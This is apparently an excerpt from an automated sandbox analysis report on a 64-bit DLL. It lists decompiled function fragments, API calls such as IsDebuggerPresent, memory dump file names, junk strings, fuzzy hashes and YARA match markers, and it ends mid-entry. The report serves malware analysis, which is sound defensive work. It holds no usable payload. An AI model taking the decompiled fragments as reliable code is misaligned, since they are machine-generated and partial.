0x7ffa0ae6aa33
0x7ffa0ae6aa3c
0x7ffa0ae6aa48
0x7ffa0ae6aa56
0x7ffa0ae6aa5f
0x7ffa0ae6aa61
0x7ffa0ae6aa63
0x7ffa0ae6aa68
0x7ffa0ae6aa75

APIs

RtlAllocateHeap.NTDLL(?,?,?,00007FFA0AE7040D,?,?,00000000,00007FFA0AE6D8B7,?,?,?,00007FFA0AE6A427,?,?,?,00007FFA0AE6A31D), ref: 00007FFA0AE6AA56

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4885db743ff87431de90f68300da65782b6b7874996cc61f6450c8fa48a4abb9
Instruction ID: cce6075672c27983d6454db0b77a829ab80cdaf655d3b6ac7c8975b15052a24b
Opcode Fuzzy Hash: 4885db743ff87431de90f68300da65782b6b7874996cc61f6450c8fa48a4abb9
Instruction Fuzzy Hash: 03F05E23E0D22345FE547771FA4127552A04F46BE0F08DAB1D82E972C2FE2CA4414620

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE61540 Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00007FFA7FFA0AE61540(long long __rcx, long long _a8) {
				long long _v24;
				intOrPtr* _t9;
				long long _t13;

				_a8 = __rcx;
				_v24 = 0xfffffffe;
				r8d = 0;
				E00007FFA7FFA0AE61910(1, _t9, _a8, _t13); // executed
				return E00007FFA7FFA0AE617A0(_a8);
			}

0x7ffa0ae61540
0x7ffa0ae61549
0x7ffa0ae61552
0x7ffa0ae6155c
0x7ffa0ae61571

APIs

Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE61567

Part of subcall function 00007FFA0AE617A0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE617B1

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: Concurrency::details::EmptyQueue::StructuredWork
String ID:
API String ID: 1865873047-0
Opcode ID: 1bd39886feb57d30d74c3629fbbe9167a18a0f50d6d703a3308aa091c38b80aa
Instruction ID: e41212bc8229a66beb83640b0d421eb310fd5179dba54dfe69ad469b9c1861c9
Opcode Fuzzy Hash: 1bd39886feb57d30d74c3629fbbe9167a18a0f50d6d703a3308aa091c38b80aa
Instruction Fuzzy Hash: 1FD09E3292859181D610BB34E85645E6720F7D33B4FA09B60EABD43AE5CE2AD5158B04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE61B10 Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00007FFA7FFA0AE61B10(void* __rax, long long __rcx, long long __rdx, long long _a8, long long _a16) {
				void* _t7;
				void* _t8;

				_t8 = __rax;
				_a16 = __rdx;
				_a8 = __rcx;
				E00007FFA7FFA0AE611A0(_a16);
				_t7 = E00007FFA7FFA0AE61B40(_t8, _a8, _a16, _t8); // executed
				return _t7;
			}

0x7ffa0ae61b10
0x7ffa0ae61b10
0x7ffa0ae61b15
0x7ffa0ae61b23
0x7ffa0ae61b35
0x7ffa0ae61b3e

APIs

char_traits.LIBCPMTD ref: 00007FFA0AE61B23

Part of subcall function 00007FFA0AE61B40: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE61B6E

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: Base::Concurrency::details::ContextIdentityQueueWorkchar_traits
String ID:
API String ID: 1444011685-0
Opcode ID: f789d12e206d7980509269e3e814af15646fd7b4fc038a1338794e0a1668acec
Instruction ID: a022f4f31560b5cfe9e47972ca4596583b7e8d7abbc798dce80efc490efee180
Opcode Fuzzy Hash: f789d12e206d7980509269e3e814af15646fd7b4fc038a1338794e0a1668acec
Instruction Fuzzy Hash: 5BD09E76929A8181D544FB22F89105AA760EBD57C0F409575FA8E83B2AEE28C1514B00

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFA0AE73CB0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 97registrywindowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 00007FFA0AE73D39
RegisterTouchWindow.USER32 ref: 00007FFA0AE73D5A
MessageBoxW.USER32 ref: 00007FFA0AE73D7A

Strings

Error, xrefs: 00007FFA0AE73D67
Cannot register application window for multi-touch input, xrefs: 00007FFA0AE73D6E

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: Window$CreateMessageRegisterTouch
String ID: Cannot register application window for multi-touch input$Error
API String ID: 490141109-480840240
Opcode ID: 84ab5ff6cfcc38e4e1d3a2e7420c273c9b72630a33a8e8b258941c1555e1b344
Instruction ID: 93f161f7b93050e8ec454777073de3e22a755ebbbe6ed07109c2e6d7529d92d2
Opcode Fuzzy Hash: 84ab5ff6cfcc38e4e1d3a2e7420c273c9b72630a33a8e8b258941c1555e1b344
Instruction Fuzzy Hash: AE511A33908B6282E750EB25F89436A73A0FB86B94F508576D58E47774EF7CE044D740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180003BE8 Relevance: 10.9, Strings: 8, Instructions: 895COMMON

Download Yara Rule

Strings

%wk, xrefs: 0000000180004571
~JO, xrefs: 0000000180003CC5
Hp, xrefs: 00000001800040E6
@, xrefs: 0000000180003F3F
]I, xrefs: 0000000180003E1A
K, xrefs: 00000001800043B5
^e?u, xrefs: 0000000180003EAF
KI@l, xrefs: 00000001800040D8

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: %wk$@$Hp$KI@l$]I$^e?u$~JO$K
API String ID: 0-1942796489
Opcode ID: 0db96a3033a52dec7f41ba08dcaea74adbed8d76393b2956a65234561adab349
Instruction ID: e1c3b1e3eb44e9ced759bc87f3cac7b1a040f97d798b52c0718f9fedf429efa7
Opcode Fuzzy Hash: 0db96a3033a52dec7f41ba08dcaea74adbed8d76393b2956a65234561adab349
Instruction Fuzzy Hash: 71A2F871504B8C8FEB59CF28C88A59E7BE2FB84744F20461DF96A872A0D774D945CF82

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180012780 Relevance: 9.3, Strings: 7, Instructions: 537COMMON

Download Yara Rule

Strings

D, xrefs: 0000000180012E27
y, xrefs: 0000000180012C97
7', xrefs: 0000000180012DC7
k, xrefs: 000000018001303C
Z<, xrefs: 0000000180012E02
o7=/, xrefs: 0000000180012D35
G(, xrefs: 0000000180012F52

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: k$7'$D$G($Z<$o7=/$y
API String ID: 0-1865188920
Opcode ID: d517ad9a530fb802bb13479e859ccf9692cae92b90ad32258a35f0c9934de413
Instruction ID: fda8176045f72ddac869dc68b56e77e08c564191d5b4e17a01401cd0e62d40de
Opcode Fuzzy Hash: d517ad9a530fb802bb13479e859ccf9692cae92b90ad32258a35f0c9934de413
Instruction Fuzzy Hash: 2032E17150C7848FD798CFA9C58A65BFBE1FB88744F108A1DF486862A0D7F8D949CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE69474 Relevance: 9.1, APIs: 6, Instructions: 83
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E00007FFA7FFA0AE69474(void* __ecx, intOrPtr __edx, void* __esp, long long __rbx, void* __rdx, long long __rsi, void* __r8) {
				void* __rdi;
				void* _t36;
				int _t40;
				void* _t45;
				intOrPtr _t53;
				signed long long _t63;
				long long _t66;
				_Unknown_base(*)()* _t86;
				void* _t90;
				void* _t91;
				void* _t93;
				signed long long _t94;
				struct _EXCEPTION_POINTERS* _t100;

				_t46 = __ecx;
				 *((long long*)(_t93 + 0x10)) = __rbx;
				 *((long long*)(_t93 + 0x18)) = __rsi;
				_t91 = _t93 - 0x4f0;
				_t94 = _t93 - 0x5f0;
				_t63 =  *0xaede008; // 0xa3acf2c2a32b
				 *(_t91 + 0x4e0) = _t63 ^ _t94;
				_t53 = r8d;
				_t45 = __ecx;
				if (__ecx == 0xffffffff) goto 0xae694b3;
				E00007FFA7FFA0AE6493C(_t36);
				r8d = 0x98;
				E00007FFA7FFA0AE66920(__ecx, 0, _t53, __esp, _t94 + 0x70, __rdx, _t86, __r8);
				r8d = 0x4d0;
				E00007FFA7FFA0AE66920(_t46, 0, _t53, __esp, _t91 + 0x10, __rdx, _t86, __r8);
				 *((long long*)(_t94 + 0x48)) = _t94 + 0x70;
				_t66 = _t91 + 0x10;
				 *((long long*)(_t94 + 0x50)) = _t66;
				__imp__RtlCaptureContext();
				r8d = 0;
				__imp__RtlLookupFunctionEntry();
				if (_t66 == 0) goto 0xae69546;
				 *(_t94 + 0x38) =  *(_t94 + 0x38) & 0x00000000;
				 *((long long*)(_t94 + 0x30)) = _t94 + 0x58;
				 *((long long*)(_t94 + 0x28)) = _t94 + 0x60;
				 *((long long*)(_t94 + 0x20)) = _t91 + 0x10;
				__imp__RtlVirtualUnwind();
				 *((long long*)(_t91 + 0x108)) =  *((intOrPtr*)(_t91 + 0x508));
				 *((intOrPtr*)(_t94 + 0x70)) = __edx;
				 *((long long*)(_t91 + 0xa8)) = _t91 + 0x510;
				 *((long long*)(_t91 - 0x80)) =  *((intOrPtr*)(_t91 + 0x508));
				 *((intOrPtr*)(_t94 + 0x74)) = _t53;
				_t40 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(_t86, _t90);
				if (UnhandledExceptionFilter(_t100) != 0) goto 0xae695a8;
				if (_t40 != 0) goto 0xae695a8;
				if (_t45 == 0xffffffff) goto 0xae695a8;
				return E00007FFA7FFA0AE63A70(E00007FFA7FFA0AE6493C(_t42), _t45, 0,  *(_t91 + 0x4e0) ^ _t94);
			}

0x7ffa0ae69474
0x7ffa0ae69474
0x7ffa0ae69479
0x7ffa0ae69482
0x7ffa0ae6948a
0x7ffa0ae69491
0x7ffa0ae6949b
0x7ffa0ae694a2
0x7ffa0ae694a7
0x7ffa0ae694ac
0x7ffa0ae694ae
0x7ffa0ae694ba
0x7ffa0ae694c0
0x7ffa0ae694cb
0x7ffa0ae694d1
0x7ffa0ae694db
0x7ffa0ae694e4
0x7ffa0ae694e8
0x7ffa0ae694ed
0x7ffa0ae69502
0x7ffa0ae69505
0x7ffa0ae6950e
0x7ffa0ae69510
0x7ffa0ae69523
0x7ffa0ae69530
0x7ffa0ae69539
0x7ffa0ae69540
0x7ffa0ae6954d
0x7ffa0ae6955f
0x7ffa0ae69563
0x7ffa0ae69571
0x7ffa0ae69575
0x7ffa0ae69579
0x7ffa0ae69583
0x7ffa0ae69596
0x7ffa0ae6959a
0x7ffa0ae6959f
0x7ffa0ae695ce

APIs

RtlCaptureContext.KERNEL32 ref: 00007FFA0AE694ED
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFA0AE69505
RtlVirtualUnwind.KERNEL32 ref: 00007FFA0AE69540
IsDebuggerPresent.KERNEL32 ref: 00007FFA0AE69579
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFA0AE69583
UnhandledExceptionFilter.KERNEL32 ref: 00007FFA0AE6958E

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: d9a81825362c2da034dc73a6dcc45eb26ccc4f6f61a283cd1a377bdfab111a7c
Instruction ID: 7803840f8c7aa219f5defa0f29590e20cacc5bfb64f1ec51faf45a1fd5d28000
Opcode Fuzzy Hash: d9a81825362c2da034dc73a6dcc45eb26ccc4f6f61a283cd1a377bdfab111a7c
Instruction Fuzzy Hash: D2317F33618B9186E7609B35F8503AE73A4FB86794F508535EA8D43B95EF3CC555CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180021A2C Relevance: 7.0, Strings: 5, Instructions: 775COMMON

Download Yara Rule

Strings

??, xrefs: 0000000180021F2D
Aw, xrefs: 00000001800223B5
>#3, xrefs: 00000001800226F2
F, xrefs: 0000000180022101
J, xrefs: 0000000180022998

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: >#3$??$Aw$F$J
API String ID: 0-2784440385
Opcode ID: 9b37fcd8b9b3a2236a01d1c259a381c152bbfd2ce75b9ee2bc70d5e09618c5cf
Instruction ID: 9fdd82093245732d6ff01b86e1d36ab714c40b68dc6afb612ae034bafb5e4a55
Opcode Fuzzy Hash: 9b37fcd8b9b3a2236a01d1c259a381c152bbfd2ce75b9ee2bc70d5e09618c5cf
Instruction Fuzzy Hash: C9924F7054838B8FDB78CF24C845BEE7BE1FB84304F10452DE8698A761E7749A49DB82

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180006B5C Relevance: 6.6, Strings: 5, Instructions: 375COMMON

Download Yara Rule

Strings

@K, xrefs: 0000000180006E7C
>S1, xrefs: 0000000180006C51
<, xrefs: 0000000180007028
9`^p, xrefs: 0000000180006F9F
$, xrefs: 0000000180007041

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: $$9`^p$>S1$@K$<
API String ID: 0-904861090
Opcode ID: 7e13130689c942aa12df05012069a4264cc12f2cb0cc79f599492960cab10520
Instruction ID: d0ca11fee3017775904e89b4535bcf8825016c76ce67da6f48249d0445d1abfd
Opcode Fuzzy Hash: 7e13130689c942aa12df05012069a4264cc12f2cb0cc79f599492960cab10520
Instruction Fuzzy Hash: BC12E37150078CDBDBACCF68C88A6DD3FB1FB443A4F605219F942962A0D7B5D989CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180014C48 Relevance: 6.5, Strings: 5, Instructions: 236COMMON

Download Yara Rule

Strings

, xrefs: 0000000180014D11, 0000000180014DEE, 0000000180014CE7
f_, xrefs: 0000000180014F12
fzT, xrefs: 0000000180014CEF
"4, xrefs: 0000000180014F27
, xrefs: 0000000180014E7F, 0000000180014EDA

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: "4$f_$fzT$$
API String ID: 0-2251851231
Opcode ID: 22d9a0b68b50d0ea5fd6d1aeab0a3e2fc9a27e070a6cf0ea182e7b607f92900b
Instruction ID: 00078a186b7d7b6ae4f12e3c11a5bc13b18b9b2cdced29765063d95cb29d2c11
Opcode Fuzzy Hash: 22d9a0b68b50d0ea5fd6d1aeab0a3e2fc9a27e070a6cf0ea182e7b607f92900b
Instruction Fuzzy Hash: 42B123B090470A8FDB48DFA8C48A5EEBBF0FB48358F15461DE806A7290D774AA45CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001CF30 Relevance: 6.3, Strings: 5, Instructions: 69COMMON

Download Yara Rule

Strings

8, xrefs: 000000018001D04E
[n, xrefs: 000000018001CF40
CX, xrefs: 000000018001CF47
eI$E, xrefs: 000000018001CFB1
\, xrefs: 000000018001CFD2

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: CX$[n$\$eI$E$8
API String ID: 0-2019653245
Opcode ID: b58e03c4429f51dfff5bc7e79067d6589c1b082eef975631b4c3cbf620760393
Instruction ID: b0bde2b46dd9974091b147c1be75073ae13835eaf58c76366964caef907b3f92
Opcode Fuzzy Hash: b58e03c4429f51dfff5bc7e79067d6589c1b082eef975631b4c3cbf620760393
Instruction Fuzzy Hash: 4E318EB190074E8FDB44CF64C48A5CE7FB0FB68798F204618E859A6250D3B896A4CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001E76C Relevance: 5.7, Strings: 4, Instructions: 737COMMON

Download Yara Rule

Strings

, xrefs: 000000018001EC4C
$, xrefs: 000000018001F2F7
|nV, xrefs: 000000018001E94F
, xrefs: 000000018001E7AD

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: $ $$$|nV
API String ID: 0-3281042611
Opcode ID: a7c4594aceaea0e8dab67c6b4234a17b84941429c25f26251dab7e9d55dda18c
Instruction ID: 0fceca5626e055d2fbf750ad096c81a0ae15a929736b2a3d881e47323bd06dff
Opcode Fuzzy Hash: a7c4594aceaea0e8dab67c6b4234a17b84941429c25f26251dab7e9d55dda18c
Instruction Fuzzy Hash: DA72FA71A0474C8BDF58CFA8C04AADDBBF5FB54344F00412DED4AAB298D7B4A91ACB45

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000F3E0 Relevance: 5.4, Strings: 4, Instructions: 432COMMON

Download Yara Rule

Strings

]>S, xrefs: 000000018000FBA2
VG, xrefs: 000000018000F95D
u`, xrefs: 000000018000FCE6
R7i, xrefs: 000000018000FA02

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: R7i$VG$]>S$u`
API String ID: 0-1600827667
Opcode ID: 32acbc697c5eb7ce2dca7a46b63a12961e990b109133ed3221841dcaa14a51a8
Instruction ID: e69c950c419dafbc2894b984fb63416e0ad2d3a581be44541dc433b6a47a3fb9
Opcode Fuzzy Hash: 32acbc697c5eb7ce2dca7a46b63a12961e990b109133ed3221841dcaa14a51a8
Instruction Fuzzy Hash: DC32F1709097C88BDBF8DF24C8897DD7BE0FF48344F50515A984E9A694CBB86689CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800173F8 Relevance: 5.4, Strings: 4, Instructions: 380COMMON

Download Yara Rule

Strings

4, xrefs: 00000001800179BA
z<, xrefs: 00000001800176EB
BB, xrefs: 000000018001788F
., xrefs: 0000000180017964

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: BB$z<$.$4
API String ID: 0-1591233792
Opcode ID: aa7d0a4ee19aefbaa19c8d8e8495d0b927018643d7d53871069b311c10225edc
Instruction ID: f44964999cc3d50e9f587f9f9c8efa5a6e46c46b2493dcde8a40a3edfa6d90f8
Opcode Fuzzy Hash: aa7d0a4ee19aefbaa19c8d8e8495d0b927018643d7d53871069b311c10225edc
Instruction Fuzzy Hash: 3302047190474DCBDF6CDF68C88A6EE7BB0FF48344F00421DEA46A6290D77A9949CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002128 Relevance: 5.3, Strings: 4, Instructions: 256COMMON

Download Yara Rule

Strings

jP, xrefs: 000000018000214C
xy, xrefs: 0000000180002465
M[, xrefs: 00000001800023F9
Jx, xrefs: 00000001800022B1

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: Jx$M[$jP$xy
API String ID: 0-882801676
Opcode ID: a27b4655e249ce8e00af1ad73db02211fa2bbf7353868e6a6b849cd1b884cbbc
Instruction ID: 58f3606e86ff435d226b8bd8aedcb6a7b303468577bfe9f696ea944d9a70988a
Opcode Fuzzy Hash: a27b4655e249ce8e00af1ad73db02211fa2bbf7353868e6a6b849cd1b884cbbc
Instruction Fuzzy Hash: DBC1087090475CCBDF59DF68D8896DDBBB0FB48308F118219F89AAB2A1CB789905CF45

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001827C Relevance: 5.2, Strings: 4, Instructions: 178COMMON

Download Yara Rule

Strings

^, xrefs: 00000001800183F5
&, xrefs: 00000001800184B7
Jn, xrefs: 0000000180018469
@2, xrefs: 0000000180018500

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: &$@2$Jn$^
API String ID: 0-1816242221
Opcode ID: 569fa3d4bf83859d4808d779e504945ae089fbdc48947470bf052a87739f6000
Instruction ID: b42d7ccd07b59f248f07516313cf01464c8448466868081e17338bda4afdc4d1
Opcode Fuzzy Hash: 569fa3d4bf83859d4808d779e504945ae089fbdc48947470bf052a87739f6000
Instruction Fuzzy Hash: 95910470D0471A8BEF98DFA8D48A6EEBBF0FB48344F108119E515B6290D7789A48CF95

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000CB8D Relevance: 5.2, Strings: 4, Instructions: 173COMMON

Download Yara Rule

Strings

0e, xrefs: 000000018000CD96
@, xrefs: 000000018000CE44
64, xrefs: 000000018000CDD8
o=, xrefs: 000000018000CD18

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 0e$64$@$o=
API String ID: 0-3194635012
Opcode ID: 2a7eec621bc3736d8bcf3cd4502b1118f0a5049720cbc299d1d867f1de7ce1b9
Instruction ID: 43be15bbb58683b0ec8bcd6d9d0e20e10858889a9d955228704270f701235499
Opcode Fuzzy Hash: 2a7eec621bc3736d8bcf3cd4502b1118f0a5049720cbc299d1d867f1de7ce1b9
Instruction Fuzzy Hash: 3B91E47051068C9FDB89DF24D88AADD3BB0FF58348F815319FC8AA6290C778D589CB49

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180028A04 Relevance: 5.1, Strings: 4, Instructions: 92COMMON

Download Yara Rule

Strings

Yfr4, xrefs: 0000000180028A22
36H, xrefs: 0000000180028AE0
kWa^, xrefs: 0000000180028B78
;, xrefs: 0000000180028B42

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: ;$36H$Yfr4$kWa^
API String ID: 0-3599472112
Opcode ID: 05a798feef6af16b9893fff0148a6d85916b1b1ef146ddbd548bcf6645ccff48
Instruction ID: 61779539911d561746882ab877a6c74db6c2f424096ebd80c4a9c7726920f4e4
Opcode Fuzzy Hash: 05a798feef6af16b9893fff0148a6d85916b1b1ef146ddbd548bcf6645ccff48
Instruction Fuzzy Hash: 1B41A0B090034E8FDF48CF24C9865DE7FB0FB68394F214619E85AA6250D77896A5CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007AF0 Relevance: 5.1, Strings: 4, Instructions: 78COMMON

Download Yara Rule

Strings

bN, xrefs: 0000000180007BF0
B , xrefs: 0000000180007C10
u, xrefs: 0000000180007AFC
?M, xrefs: 0000000180007B48

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: ?M$B $bN$u
API String ID: 0-4267052880
Opcode ID: c9a15cb732fd24f5d33c0626e266d07e83fb093bffd41cbb69e3c4f465881b9b
Instruction ID: 4c93545f67a4f45fbff1f0d508ee645a9c55300ad5c75e3690df59447bdefe11
Opcode Fuzzy Hash: c9a15cb732fd24f5d33c0626e266d07e83fb093bffd41cbb69e3c4f465881b9b
Instruction Fuzzy Hash: 0F3119715187808FD76CCF28C19A25FBBF1BBC6704F50891CF68A8A390D7B69908CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800264F8 Relevance: 4.2, Strings: 3, Instructions: 454COMMON

Download Yara Rule

Strings

(, xrefs: 0000000180026CE0
U, xrefs: 0000000180026E54
wU, xrefs: 0000000180026E3F

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

